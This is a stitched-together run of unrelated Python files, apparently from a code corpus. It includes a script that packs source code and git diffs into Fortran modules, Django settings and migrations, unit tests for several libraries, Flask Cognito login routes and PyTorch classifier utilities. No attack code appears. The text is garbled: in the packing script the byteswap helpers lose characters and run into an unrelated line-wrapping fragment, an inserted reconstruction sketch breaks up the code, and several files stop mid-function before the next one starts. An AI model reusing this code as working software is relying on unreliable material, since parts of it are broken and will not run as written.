/usr/bin/env python import binascii import struct import os import sys import time import subprocess as sp import tarfile import hashlib import platform import gzip import codecs try: import argparse got_argparse = True except: got_argparse = False def str2bool(x): if x.lower() not in ['true', 'yes', '1', 'false', 'no', '0']: raise TypeError("Argument is not a Boolean string") return x.lower() in ['true', 'yes', '1'] def stripped(s): try: # python 2 s = unicode(s, 'ascii', 'ignore') except(NameError): # python 3 s = s.encode('ascii', 'ignore').decode() return s.strip() if got_argparse: argp = argparse.ArgumentParser( description="Pack source code for writing to SDF output") argp.add_argument("prefix", type=str, help="Package name") argp.add_argument("pack_source_code", type=str2bool, help="Pack source code") argp.add_argument("pack_git_diff", type=str2bool, help="Pack git diff") argp.add_argument("pack_git_diff_from_origin", type=str2bool, help="Pack git diff from origin") argp.add_argument("generate_checksum", type=str2bool, help="Generate checksum") argp.add_argument("f77_output", type=str2bool, help="Fortran 77 output") argp.add_argument("outfile", type=str, help="Output file") argp.add_argument("compiler_info", type=stripped, help="Compiler info") argp.add_argument("compiler_flags", type=stripped, help="Compiler flags") argp.add_argument("filelist", type=str, nargs='*', help="Source files") argp.add_argument("--diff-branch", type=str, default="origin/main", help="Git branch to compare differences") args = argp.parse_args() else: args = type("", (), dict(dummy=1))() args.prefix = sys.argv[2] (args.pack_source_code, args.pack_git_diff, args.pack_git_diff_from_origin, args.generate_checksum, args.f77_output,) = map(str2bool, sys.argv[3:8]) args.outfile = sys.argv[8] (args.compiler_info, args.compiler_flags,) = map(stripped, sys.argv[9:11]) args.filelist = sys.argv[11:] args.diff_branch = "origin/main" prefix = args.prefix pack_source_code = args.pack_source_code pack_git_diff = args.pack_git_diff pack_git_diff_from_origin = args.pack_git_diff_from_origin generate_checksum = args.generate_checksum commitfile = os.path.join(os.environ['GIT_WORK_TREE'], 'src', 'COMMIT') archive = "source_info_archive.tgz" hexdump = "source_info_hexdump.txt" gitdiff = "source_info_gitdiff.txt" varname = "%s_bytes" % prefix diffname = "%s_diff_bytes" % prefix module_name = "%s_source_info" % prefix outfile = args.outfile incfile = os.path.splitext(outfile)[0] + '_include.inc' f77_output = args.f77_output nbytes = 8 nelements = 0 padding = 0 vname = varname if f77_output: inc_handle = open(incfile, "w") linestart = 6*' ' linecont = 5*' '+'&' suffix = '' ncolumns = 72 ncontinuation = 19 else: linestart = '' linecont = '' suffix = '&' ncolumns = 132 # gfortran ignores the F90 standard of 139 ncontinuation = 39 def byteswap4(s): s = binascii.unhexlify(s) a, = struct.unpack('>L', s) s = struct.pack('Q', s) s = struct.pack(' ncolumns): of.write(ostring[:ncolumns]+'\n') ostring = linecont + ostring[ncolumns:] rem = len(ostring) else: while (rem > ncolumns): of.write(ostring[:ncolumns-1]+'&\n') ostring = '&' + ostring[ncolumns-1:] rem = len(ostring) if rem > 0: of.write(ostring) of.write('\n') def print_character(name, value): global vname, of # ilen = len(value) ilen = 256 var = "%s_%s" % (vname, name) if f77_output: of = inc_handle wrapped("CHARACTER*%i %s" % (ilen, var)) wrapped("COMMON/c_%s/%s" % (vname, var)) of = out_handle wrapped("CHARACTER*%i %s" % (ilen, var)) wrapped("COMMON/c_%s/%s" % (vname, var)) 
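# --- Hedged sketch of the byteswap helpers used above. The struct.pack format
# strings in this copy appear garbled (text around '<'/'>' was lost), so the
# little-endian '<L'/'<Q' formats below are an assumption rather than the
# verified original: the idea is to re-order one hex-encoded group from big-
# to little-endian before it is emitted in a Fortran DATA statement.
import binascii
import struct

def byteswap4(s):
    a, = struct.unpack('>L', binascii.unhexlify(s))
    return binascii.hexlify(struct.pack('<L', a)).decode()

def byteswap8(s):
    a, = struct.unpack('>Q', binascii.unhexlify(s))
    return binascii.hexlify(struct.pack('<Q', a)).decode()

def byteswap(nbytes, s):
    return byteswap8(s) if nbytes == 8 else byteswap4(s)

assert byteswap(4, '01020304') == '04030201'
assert byteswap(8, '0102030405060708') == '0807060504030201'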
wrapped("DATA %s/'%s'/" % (var, value)) else: ilen = len(value) if ilen == 0: ilen = 1 wrapped("CHARACTER(LEN=%i) :: %s = '%s'" % (ilen, var, value)) def print_integer(name, value): global vname, of var = "%s_%s" % (vname, name) if f77_output: of = inc_handle wrapped("INTEGER " + var) wrapped("COMMON/i_%s/%s" % (vname, var)) of = out_handle wrapped("INTEGER " + var) wrapped("COMMON/i_%s/%s" % (vname, var)) wrapped("DATA %s/%i/" % (var, value)) else: wrapped("INTEGER, PARAMETER :: %s = %i" % (var, value)) def get_bytes_checksum(files): global checksum_type if not generate_checksum: checksum_type = '' return '' cksum = hashlib.new('sha256') for name in files: f = open(name) while True: data = f.read(cksum.block_size) if not data: break cksum.update(data.encode('utf-8')) checksum_type = 'sha256' return cksum.hexdigest() def write_data_bytes(filename, varname): global mimetype, of global linestart, linecont, suffix, ncolumns, ncontinuation f = open(filename, 'rb') d = f.read() dhex = codecs.encode(d, 'hex_codec').decode('utf-8') f.close() os.remove(filename) nelements = (len(d)+nbytes-1) // nbytes padding = nelements * nbytes - len(d) dhex += '00' * padding print_character('mimetype', mimetype) print_integer('padding', padding) print_integer('len', nelements) print_integer_array(nelements) nwidth = len("z'',") + 2 * nbytes nper_line_body = (ncolumns - 1) // nwidth sdata = linestart + "DATA(%s(i),i=%i,%i)/" % (varname, nelements, nelements) nper_line_first = (ncolumns - len(sdata) - 1) // nwidth nper_segment = nper_line_first + nper_line_body * ncontinuation i0 = 0 segline = 0 elements_written = 0 while elements_written < nelements: ss = "" if segline == 0: i1 = min(i0 + nper_segment, nelements) ss += linestart + "DATA(%s(i),i=%i,%i)/" % (varname, i0+1, i1) i0 = i1 else: ss += linecont shex = dhex[2*nbytes*elements_written:2*nbytes*(elements_written+1)] shex = byteswap(nbytes, shex) ss += "z'%s'" % shex elements_written = elements_written + 1 if segline == 0: nper_line = nper_line_first - 1 else: nper_line = nper_line_body - 1 n = 0 while n < nper_line and elements_written != nelements: shex = dhex[2*nbytes*elements_written: 2*nbytes*(elements_written+1)] shex = byteswap(nbytes, shex) ss += ",z'%s'" % shex elements_written = elements_written + 1 n = n + 1 if elements_written == nelements or segline == ncontinuation: ss += "/\n" else: ss += "," + suffix + "\n" of.write(ss) if segline == ncontinuation: segline = 0 else: segline = segline + 1 def print_integer_array(value): global of, nbytes, vname if value == 0: value = 1 if f77_output: of = inc_handle wrapped("INTEGER*%i %s(%s_len)" % (nbytes, vname, vname)) of = out_handle wrapped("INTEGER*%i %s(%i)" % (nbytes, vname, value)) else: wrapped("INTEGER(%i) :: %s(%i)" % (nbytes, vname, value)) try: cmd = sp.Popen("git describe --always --long --dirty", shell=True, stderr=sp.PIPE, stdout=sp.PIPE) output = cmd.communicate() if cmd.returncode == 127: print('WARNING: Git command not found') git_version = '' pack_git_diff = False try: f = open(commitfile, "r") string = f.readline().rstrip('\n') f.close() git_version = string.split('=')[1].replace('"', '') except: pass elif cmd.returncode != 0 and str(output[1]).find('ot a git repo') != -1: print('WARNING: Not a git repository') git_version = '' pack_git_diff = False try: f = open(commitfile, "r") string = f.readline().rstrip('\n') f.close() git_version = string.split('=')[1].replace('"', '') except: pass elif cmd.returncode != 0: raise Exception('ERROR: unable to generate git diff') else: git_version = 
output[0].decode('utf-8').rstrip() pack_git_diff = True except: raise Exception('ERROR: unable to generate git diff') tsec = time.time() compile_date = int(round(tsec)) compile_date_string = time.strftime("%Y-%m-%d-%H:%M:%S", time.localtime(tsec)) compile_machine_info = ' '.join((platform.node(), platform.platform())) compiler_info = args.compiler_info compiler_flags = args.compiler_flags # fnull=open(os.devnull,'w') # filelist = sp.check_output("git ls-files --cached --no-empty-directory " # + "--full-name", shell=True, # stderr=fnull).rstrip() filelist = args.filelist if filelist == []: pack_source_code = False # Now write the file out_handle = open(outfile, "w") of = out_handle if f77_output: of.write(linestart + "SUBROUTINE %s_source_info\n" % module_name) else: of.write(linestart + "MODULE %s\n\n" % module_name) of.write(linestart + "IMPLICIT NONE\n\n") print_character('git_version', git_version) print_character('compile_date_string', compile_date_string) print_character('compile_machine_info', compile_machine_info) print_character('compiler_info', compiler_info) print_character('compiler_flags', compiler_flags) print_integer('compile_date', compile_date) if pack_source_code or pack_git_diff: if f77_output: of.write(linestart + "INTEGER i\n\n") else: of.write(linestart + "INTEGER, PRIVATE :: i\n") vname = varname checksum_type = '' checksum = '' if filelist != []: checksum = get_bytes_checksum(filelist) print_character('checksum_type', checksum_type) print_character('checksum', checksum) if not pack_source_code: mimetype = '' print_character('mimetype', mimetype) print_integer('padding', padding) print_integer('len', 0) print_integer_array(0) else: tar = tarfile.open(archive, "w:gz") for name in filelist: tar.add(name) tar.close() mimetype = 'application/x-tar-gz' write_data_bytes(archive, vname) vname = diffname checksum_type = '' checksum = '' if not pack_git_diff: mimetype = '' print_character('checksum_type', checksum_type) print_character('checksum', checksum) print_character('mimetype', mimetype) print_integer('padding', padding) print_integer('len', 0) print_integer_array(0) else: if pack_git_diff_from_origin: sp.call(["git diff %s > %s" % (args.diff_branch, gitdiff)], shell=True) else: sp.call(["git diff > %s" % gitdiff], shell=True) if os.path.getsize(gitdiff) != 0: checksum = get_bytes_checksum([gitdiff]) zgitdiff = gitdiff + '.gz' f_in = open(gitdiff, 'rb') f_out = gzip.open(zgitdiff, 'wb') f_out.writelines(f_in) f_out.close() f_in.close() os.remove(gitdiff) os.rename(zgitdiff, gitdiff) mimetype = 'application/x-gzip' print_character('checksum_type', checksum_type) print_character('checksum', checksum) write_data_bytes(gitdiff, vname) if f77_output: of.write(linestart + "END SUBROUTINE\n") else: of.write("\nEND MODULE %s\n" % module_name) INSTALLED_APPS = [ "examples.dummy_pool", "examples.db_pool", ] # ENTRYPOINTS = "pools.entries" LOGGING = { 'version': 1, 'disable_existing_loggers': False, "handlers": { "console": { 'level': 'DEBUG', 'class': 'logging.StreamHandler', 'formatter': 'color' }, "rmq": { 'level': 'DEBUG', 'class': 'python_logging_rabbitmq.RabbitMQHandler', 'host': 'localhost', 'port': 5672, 'username': 'guest', 'password': '', 'exchange': 'log', 'declare_exchange': False, 'connection_params': { 'virtual_host': '/', 'connection_attempts': 3, 'socket_timeout': 5000 }, 'fields': { 'source': 'MainAPI', 'env': 'production' }, 'fields_under_root': True } }, "formatters": { "standard": { "format": "%(levelname)-8s %(asctime)s %(message)s" }, "color": { "()": 
"fairways.helpers.ColoredFormatterFactory", "format_template": "%(log_color)s%(levelname)-8s%(reset)s %(log_color)s%(message)s", "datefmt": None, "reset": True, "log_colors": { 'DEBUG': 'cyan', 'INFO': 'green', 'WARNING': 'yellow', 'ERROR': 'red', 'CRITICAL': 'red,bg_white', }, "secondary_log_colors": {}, "style": '%' } }, "loggers": { "": { "handlers": ["console"], "level": "DEBUG", "formatter": "standard" }, "app": { "handlers": ["console"], "level": "DEBUG", "formatter": "color" }, "rmq": { "handlers": ["rmq"] } } } CONNECTIONS = { "db_sqlite_example": ":memory:" }"""Test 4.3.""" import sys sys.path.insert(0, '/Users/zt/programming/interviews/interview-prep/cracking-the-coding-interview/data_structures') from bst import BinarySearchTree, Node # def test_list_of_depths(): # """Test list of depths returns correctly.""" # from CTCI_4_3 import list_of_depths # bst = BinarySearchTree() # bst.root = Node(5) # bst.root.left = Node(3) # bst.root.right = Node(7) # bst.root.left.left = Node(2) # bst.root.left.right = Node(4) # bst.root.right.left = Node(6) # bst.root.right.right = Node(8) # assert list_of_depths(bst) == [[5], [3, 7], [2, 4, 6, 8]] AdirthaBorgohain/Agency-CRMdashboard/urls.py from . import views from django.urls import path urlpatterns = [ path("home", views.index, name="index"), path('analytics', views.analytics, name="analytics"), path('customers', views.customers_agents, name="customers_agents") ]src/main/python/progress1bar/__init__.py from .progressbar import ProgressBar lib_bgp_simulator/tests/yaml_system_tests/non_routed_prefix/test_non_routed_prefix.py from pathlib import Path from ...graphs import Graph006 from ...utils import BaseGraphSystemTester from ....engine_input import NonRoutedPrefixHijack from ....engine import BGPSimpleAS from ....engine import BGPAS from ....engine import ROVSimpleAS from ....engine import ROVAS class BaseNonRoutedPrefixTester(BaseGraphSystemTester): GraphInfoCls = Graph006 EngineInputCls = NonRoutedPrefixHijack base_dir = Path(__file__).parent adopting_asns = (2,) class Test013NonRoutedPrefixROVSimple(BaseNonRoutedPrefixTester): BaseASCls = BGPSimpleAS AdoptASCls = ROVSimpleAS class Test014NonRoutedPrefix2ROV(BaseNonRoutedPrefixTester): BaseASCls = BGPAS AdoptASCls = ROVAS usegalaxy-au/galaxy-media-sitewebapp/home/migrations/0010_notice_is_published.py # Generated by Django 3.2 on 2022-02-15 23:26 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('home', '0009_auto_20220118_0635'), ] operations = [ migrations.AddField( model_name='notice', name='is_published', field=models.BooleanField(default=False, help_text='Unpublished content is visible to admin users only. Use this to review content before release to public users.'), ), ] #!/usr/bin/env python3 # # Copyright (c) 2020 Mobvoi Inc. 
(authors: ) # # See ../../../LICENSE for clarification regarding multiple authors # To run this single test, use # # ctest --verbose -R fsa_test_py -E host import unittest import k2 import torch def _remove_leading_spaces(s: str) -> str: lines = [line.strip() for line in s.split('\n') if line.strip()] return '\n'.join(lines) class TestFsa(unittest.TestCase): def test_acceptor_from_str(self): s = ''' 0 1 2 -1.2 0 2 10 -2.2 1 6 -1 -3.2 1 3 3 -4.2 2 6 -1 -5.2 2 4 2 -6.2 3 6 -1 -7.2 5 0 1 -8.2 6 ''' fsa = k2.Fsa(_remove_leading_spaces(s)) expected_str = ''' 0 1 2 -1.2 0 2 10 -2.2 1 6 -1 -3.2 1 3 3 -4.2 2 6 -1 -5.2 2 4 2 -6.2 3 6 -1 -7.2 5 0 1 -8.2 6 ''' assert _remove_leading_spaces(expected_str) == _remove_leading_spaces( fsa.to_str()) expected_str = ''' 0 1 2 1.2 0 2 10 2.2 1 6 -1 3.2 1 3 3 4.2 2 6 -1 5.2 2 4 2 6.2 3 6 -1 7.2 5 0 1 8.2 6 ''' assert _remove_leading_spaces(expected_str) == _remove_leading_spaces( fsa.to_str(openfst=True)) arcs = fsa.arcs assert isinstance(arcs, torch.Tensor) assert arcs.dtype == torch.int32 assert arcs.device.type == 'cpu' assert arcs.shape == (8, 3), 'there should be 8 arcs' assert torch.allclose(arcs[0], torch.tensor([0, 1, 2], dtype=torch.int32)) assert torch.allclose( fsa.weights, torch.tensor([-1.2, -2.2, -3.2, -4.2, -5.2, -6.2, -7.2, -8.2], dtype=torch.float32)) fsa = fsa.to('cuda') arcs[0][0] += 10 assert arcs[0][0] == 10, 'arcs should still be accessible' arcs = fsa.arcs assert arcs.dtype == torch.int32 assert arcs.device.type == 'cuda' assert arcs.device.index == 0 assert arcs.shape == (8, 3), 'there should be 8 arcs' assert torch.allclose( arcs[1], torch.tensor([0, 2, 10], dtype=torch.int32, device=arcs.device)) def test_transducer_from_str(self): s = ''' 0 1 2 22 -1.2 0 2 10 100 -2.2 1 6 -1 16 -4.2 1 3 3 33 -3.2 2 6 -1 26 -5.2 2 4 2 22 -6.2 3 6 -1 36 -7.2 5 0 1 50 -8.2 6 ''' fsa = k2.Fsa(_remove_leading_spaces(s)) assert fsa.aux_labels.dtype == torch.int32 assert fsa.aux_labels.device.type == 'cpu' assert torch.allclose( fsa.aux_labels, torch.tensor([22, 100, 16, 33, 26, 22, 36, 50], dtype=torch.int32)) expected_str = ''' 0 1 2 22 -1.2 0 2 10 100 -2.2 1 6 -1 16 -4.2 1 3 3 33 -3.2 2 6 -1 26 -5.2 2 4 2 22 -6.2 3 6 -1 36 -7.2 5 0 1 50 -8.2 6 ''' assert _remove_leading_spaces(expected_str) == _remove_leading_spaces( fsa.to_str()) expected_str = ''' 0 1 2 22 1.2 0 2 10 100 2.2 1 6 -1 16 4.2 1 3 3 33 3.2 2 6 -1 26 5.2 2 4 2 22 6.2 3 6 -1 36 7.2 5 0 1 50 8.2 6 ''' assert _remove_leading_spaces(expected_str) == _remove_leading_spaces( fsa.to_str(openfst=True)) def test_symbol_table_and_dot(self): isym_str = ''' 0 a 1 b 2 c 3 ''' osym_str = ''' 0 x 1 y 2 z 3 ''' isym = k2.SymbolTable.from_str(isym_str) osym = k2.SymbolTable.from_str(osym_str) rules = ''' 0 1 1 1 0.5 0 1 2 2 1.5 1 2 3 3 2.5 2 3 -1 0 3.5 3 ''' fsa = k2.Fsa(_remove_leading_spaces(rules)) fsa.set_isymbol(isym) fsa.set_osymbol(osym) dot = fsa.to_dot() dot.render('/tmp/fsa', format='pdf') # the fsa is saved to /tmp/fsa.pdf if __name__ == '__main__': unittest.main() #!/usr/bin/env python """ Contains tests for type formatters from the `array.py` module. :file: VectorTests.py :date: 29/08/2015 :authors: - <> """ from .utils import * class ThatStruct(Struct): """ A simple `Struct`. """ data = u16(0x55AA) indicator = u8(0xFA) alignment = u8 class HasArray(Struct): array = u8[4] class VectorTests(HydrasTestCase): """ A testcase for testing types from the `array.py` module. """ def test_typed_array_default_type(self): """ Test the Array's default item type. 
""" array = u8[3]() self.assertEqual(array.serialize([0] * 3), b'\x00\x00\x00') def test_typed_array_non_default_type(self): """ Test the TypeArray using a scalar value other than the default. """ array = u16[2]() data = [0xDEAF, 0xCAFE] self.assertEqual(array.serialize(data), b'\xAF\xDE\xFE\xCA') def test_typed_array_big_endian(self): """ Test the Array with a multi-byte type in BigEndian. """ array = i16_be[3]() data = [-2, 100, 200] self.assertEqual(array.serialize(data), b'\xFF\xFE\x00\x64\x00\xC8') def test_nested_struct_array(self): """ Test the Array with a Struct type. """ array = ThatStruct[2]() data = [ThatStruct(), ThatStruct()] data[0].indicator = 0 self.assertEqual(array.serialize(data), b'\xAA\x55\x00\x00\xAA\x55\xFA\x00') def test_value_assignments(self): o = HasArray() o.array = b'\x00' * 4 o.array = [0] * 4 o.array = (0, ) * 4 wrong_types = [None, 0, True] for v in wrong_types: with self.assertRaises(TypeError): o.array = v def test_default_value(self): self.assertEqual(u16[2]([1]).default_value, [1]) self.assertEqual(u16[2]([1, 1]).default_value, [1, 1]) with self.assertRaises(ValueError): u16[2]([1, 1, 1]) def test_shorter_value(self): a = HasArray() a.array = [0, 0] self.assertEqual(a.serialize(), b'\00\x00\x00\x00') # Generated by Django 2.2.13 on 2020-07-22 07:37 import django.contrib.gis.db.models.fields from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('pipeline', '0037_merge_20200722_0736'), ] operations = [ migrations.CreateModel( name='Hex', fields=[ ('id', models.CharField(max_length=12, primary_key=True, serialize=False)), ('geom', django.contrib.gis.db.models.fields.PolygonField(srid=4326)), ('avail_5_1', models.BooleanField()), ('avail_10_2', models.BooleanField()), ('avail_25_5', models.BooleanField()), ('avail_50_10', models.BooleanField()), ], ), migrations.CreateModel( name='ISP', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=127)), ], ), migrations.CreateModel( name='Service', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('hex', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='pipeline.Hex')), ('isp', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pipeline.ISP')), ], ), ] from audiomate import annotations from audiomate import tracks from audiomate.corpus.subset import subview import pytest from tests import resources class TestMatchingUtteranceIdxFilter: def test_match(self): utt_filter = subview.MatchingUtteranceIdxFilter(utterance_idxs={'a', 'b', 'd'}) assert utt_filter.match(tracks.Utterance('a', 'x'), None) assert utt_filter.match(tracks.Utterance('b', 'x'), None) assert utt_filter.match(tracks.Utterance('d', 'x'), None) assert not utt_filter.match(tracks.Utterance('c', 'x'), None) assert not utt_filter.match(tracks.Utterance('e', 'x'), None) def test_match_inverse(self): utt_filter = subview.MatchingUtteranceIdxFilter(utterance_idxs={'a', 'b', 'd'}, inverse=True) assert not utt_filter.match(tracks.Utterance('a', 'x'), None) assert not utt_filter.match(tracks.Utterance('b', 'x'), None) assert not utt_filter.match(tracks.Utterance('d', 'x'), None) assert utt_filter.match(tracks.Utterance('c', 'x'), None) assert utt_filter.match(tracks.Utterance('e', 'x'), None) def test_serialize(self): f = subview.MatchingUtteranceIdxFilter(utterance_idxs={'a', 'b', 'd'}) assert 
f.serialize() == 'include,a,b,d' def test_serialize_inverse(self): f = subview.MatchingUtteranceIdxFilter(utterance_idxs={'a', 'b', 'd'}, inverse=True) assert f.serialize() == 'exclude,a,b,d' def test_parse(self): f = subview.MatchingUtteranceIdxFilter.parse('include,a,b,d') assert f.utterance_idxs == {'a', 'b', 'd'} assert not f.inverse def test_parse_inverse(self): f = subview.MatchingUtteranceIdxFilter.parse('exclude,a,b,d') assert f.utterance_idxs == {'a', 'b', 'd'} assert f.inverse @pytest.fixture def utt_without_noise(): utt = tracks.Utterance('utt-1', 'file-1') utt.set_label_list(annotations.LabelList(idx='alpha', labels=[ annotations.Label('music', 0, 5), annotations.Label('speech', 5, 12), annotations.Label('music', 13, 15) ])) utt.set_label_list(annotations.LabelList(idx='bravo', labels=[ annotations.Label('music', 0, 1), annotations.Label('speech', 2, 6) ])) return utt @pytest.fixture def utt_with_noise(): utt = tracks.Utterance('utt-2', 'file-2') utt.set_label_list(annotations.LabelList(idx='alpha', labels=[ annotations.Label('music', 0, 5), annotations.Label('speech', 5, 12), annotations.Label('noise', 13, 15) ])) utt.set_label_list(annotations.LabelList(idx='bravo', labels=[ annotations.Label('music', 0, 1), annotations.Label('speech', 2, 6) ])) return utt class TestMatchingLabelFilter: def test_match_all_label_lists(self, utt_with_noise, utt_without_noise): label_filter = subview.MatchingLabelFilter(labels={'music', 'speech'}) assert label_filter.match(utt_without_noise, None) assert not label_filter.match(utt_with_noise, None) def test_match_single(self, utt_with_noise, utt_without_noise): label_filter = subview.MatchingLabelFilter(labels={'music', 'speech'}, label_list_ids={'alpha'}) assert label_filter.match(utt_without_noise, None) assert not label_filter.match(utt_with_noise, None) label_filter = subview.MatchingLabelFilter(labels={'music', 'speech'}, label_list_ids={'bravo'}) assert label_filter.match(utt_without_noise, None) assert label_filter.match(utt_with_noise, None) def test_serialize(self): label_filter = subview.MatchingLabelFilter(labels={'music', 'speech'}, label_list_ids={'alpha'}) assert label_filter.serialize() == 'alpha|||music,speech' def test_serialize_no_label_list_ids(self): label_filter = subview.MatchingLabelFilter(labels={'music', 'speech'}) assert label_filter.serialize() == '|||music,speech' def test_parse(self): label_filter = subview.MatchingLabelFilter.parse('alpha|||music,speech') assert label_filter.labels == {'music', 'speech'} assert label_filter.label_list_ids == {'alpha'} def test_parse_no_label_list_ids(self): label_filter = subview.MatchingLabelFilter.parse('music,speech') assert label_filter.labels == {'music', 'speech'} assert label_filter.label_list_ids == set() @pytest.fixture def sample_subview(): utt_filter = subview.MatchingUtteranceIdxFilter(utterance_idxs={'utt-1', 'utt-3'}) corpus = resources.create_dataset() return subview.Subview(corpus, filter_criteria=[utt_filter]) class TestSubview: def test_tracks(self, sample_subview): assert sample_subview.num_tracks == 2 assert 'wav-1' in sample_subview.tracks.keys() assert 'wav_3' in sample_subview.tracks.keys() def test_utterances(self, sample_subview): assert sample_subview.num_utterances == 2 assert 'utt-1' in sample_subview.utterances.keys() assert 'utt-3' in sample_subview.utterances.keys() def test_issuers(self, sample_subview): assert sample_subview.num_issuers == 2 assert 'spk-1' in sample_subview.issuers.keys() assert 'spk-2' in sample_subview.issuers.keys() def 
test_serialize(self, sample_subview): serialized = sample_subview.serialize() assert serialized == 'matching_utterance_ids\ninclude,utt-1,utt-3' def test_parse(self): corpus = resources.create_dataset() sv = subview.Subview.parse('matching_utterance_ids\ninclude,utt-1,utt-3', corpus=corpus) assert len(sv.filter_criteria) == 1 assert sv.filter_criteria[0].utterance_idxs == {'utt-1', 'utt-3'} def test_utterances_without_issuers(self, sample_subview): sample_subview.corpus.utterances['utt-3'].issuer = None sample_subview.corpus.utterances['utt-4'].issuer = None sample_subview.corpus.utterances['utt-5'].issuer = None assert sample_subview.num_utterances == 2 assert sample_subview.num_issuers == 1 from . import * class GetUserSuggestionsController(AppDevController): def get_path(self): return '/users/suggestions/' def get_methods(self): return ['GET'] @authorize def content(self, **kwargs): user = kwargs.get('user') suggested_users = users_dao.get_suggested_users(user.id, 20) return {'users': [user_schema.dump(u).data for u in suggested_users]} class Solution: def diStringMatch(self, S: str) -> List[int]: lowest = 0 highest = len(S) res = list() for char in S: if char == 'I': res.append(lowest) lowest += 1 else: res.append(highest) highest -= 1 if char == 'I': res.append(lowest) else: res.append(highest) return res from flask import Blueprint from flask import jsonify from flask import redirect from flask import request from flask import url_for from flask_login import current_user from flask_login import login_required from flask_login import login_user from flask_login import logout_user from http import HTTPStatus from models.user import User from shared.cognito import cognito from uuid import uuid4 user_routes = Blueprint('user_routes', __name__) @user_routes.route('/current_user', methods=['GET']) @login_required def get_current_user(): return jsonify(user=current_user.to_json(), success=True) # Cognito will return a ?code=.... 
arg to this endpoint, which we can exchange for a Cognito JWT @user_routes.route('/oauth/cognito/callback', methods=['GET']) def login_via_cognito_callback(): login_code = request.args.get('code') email = cognito.get_email_from_code( code=login_code, callback_url=url_for( 'user_routes.login_via_cognito_callback', _external=True )) if not email: return jsonify(error="OAuth did not return an email address property.") user = User(email) if user.exists: login_user(user) return redirect('/') else: _user = User(email) _user.email = email _user.id = str(uuid4()) _user.save() login_user(_user) return redirect('/') # Redirect to Cognito OAuth site @user_routes.route('/oauth/cognito/login', methods=['GET']) def oauth_login_redirect(): print(request, flush=True) redirect_url=cognito.cognito_login_url( callback_url=url_for( 'user_routes.login_via_cognito_callback', _external=True )) return redirect(redirect_url) @user_routes.route('/logout', methods=['GET']) def user_logout_view(): logout_user() return redirect('/') # Allow an app to snag an auth token and exchange it for a local JWT @user_routes.route('/jwt/cognito/') def echange_cognito_code_for_jwt(login_code): email = cognito.get_email_from_code( code=login_code, callback_url=url_for( 'user_routes.login_via_cognito_callback', _external=True )) _user = User(email) if _user.exists: return jsonify(jwt=_user.create_jwt(), success=True) else: resp = jsonify(error='No such user found', success=False) resp.status_code = HTTPStatus.NOT_FOUND return respronamit/migl-Rontoy-classification/utils.py import numpy as np import torch.utils.data as utils import torch import torch.nn as nn from bottleneck import Bottleneck import matplotlib.pyplot as plt def create_function(order, max_coef): a = np.random.uniform(-max_coef, max_coef, size=order) b = np.random.uniform(-max_coef, max_coef, size=order) def function(x): function_value = 0 for n in range(len(a)): function_value += a[n] * np.cos((n+1)*x) + b[n] * np.sin((n+1)*x) return function_value return function # def normalize(y): return (y - np.mean(y)) / np.std(y) # fig, ax = plt.subplots(5, 5) # for i in range(5): # for j in range(5): # func = create_function(3, 1) # x = np.linspace(0,2 * np.pi) # # ax[i,j].plot(x, normalize(func(x))) # ax[i,j].plot(x, func(x)) # plt.show() def create_dataset(seed, datapoint_size, number_datapoints_train, number_datapoints_test, num_classes, funcs_per_class, noise_strength, batch_size, size_signal_area, number_start_locations): np.random.seed(seed) functions_train = [[create_function(3,1) for i in range(funcs_per_class)] for j in range(num_classes)] functions_test = [[create_function(3,1) for i in range(funcs_per_class)] for j in range(num_classes)] pattern_x = np.linspace(0, 2*np.pi, size_signal_area) signals = [create_function(3,1)(pattern_x) for i in range(num_classes)] classes_train = np.random.randint(0, num_classes, size=number_datapoints_train) classes_test = np.random.randint(0, num_classes, size=number_datapoints_test) possible_x = np.linspace(0, 2*np.pi, 2000) x = np.array(sorted(np.random.choice(possible_x, datapoint_size, replace=False))) start_locations = np.random.choice(list(range(datapoint_size - size_signal_area)), replace=False, size=number_start_locations) print(start_locations) ys_train = [] ys_test = [] for i in range(number_datapoints_train): func_idx = np.random.randint(0, funcs_per_class) func = functions_train[classes_train[i]][func_idx] y = func(x) + np.random.normal(0, noise_strength, datapoint_size) # start = np.random.randint(0, datapoint_size - 
size_signal_area) start_idx = np.random.randint(0, number_start_locations) start = start_locations[start_idx] y[start:start+size_signal_area] = signals[classes_train[i]] ys_train.append(y) for i in range(number_datapoints_test): func_idx = np.random.randint(0, funcs_per_class) func = functions_test[classes_test[i]][func_idx] y = func(x) + np.random.normal(0, noise_strength, datapoint_size) # start = np.random.randint(0, datapoint_size - size_signal_area) start_idx = np.random.randint(0, number_start_locations) start = start_locations[start_idx] y[start:start+size_signal_area] = signals[classes_test[i]] ys_test.append(y) train_dataset = utils.TensorDataset(torch.from_numpy(np.array(ys_train)).float(), torch.from_numpy(classes_train).long()) test_dataset = utils.TensorDataset(torch.from_numpy(np.array(ys_test)).float(), torch.from_numpy(classes_test).long()) train_dataloader = utils.DataLoader(train_dataset, batch_size=batch_size, shuffle=True) test_dataloader = utils.DataLoader(test_dataset, batch_size=batch_size, shuffle=True) return train_dataloader, test_dataloader class Squeeze(nn.Module): def __init__(self): super(Squeeze, self).__init__() def forward(self, x): return x.squeeze() class Flatten(nn.Module): def forward(self, input): return input.view(input.size(0), -1) class Net(nn.Module): def __init__(self, vib, data_size, p_dropout, latent_size, num_classes): super(Net, self).__init__() self.vib = vib self.net = nn.Sequential( nn.Conv1d(1, 10, kernel_size=11), nn.ReLU(), Flatten(), nn.Linear((data_size-10)*10, latent_size), nn.Dropout(p_dropout), nn.ReLU(), ) if vib: self.reg_layer = Bottleneck(latent_size, 256) else: self.reg_layer = nn.Linear(latent_size, 256) self.net2 = nn.Sequential( nn.ReLU(), nn.Linear(256, num_classes), ) def forward(self, x): x = x.unsqueeze(1) x = self.net(x) if self.vib: x, kl = self.reg_layer(x) kl = torch.sum(kl, dim=1) # TODO: Find out dimension! 
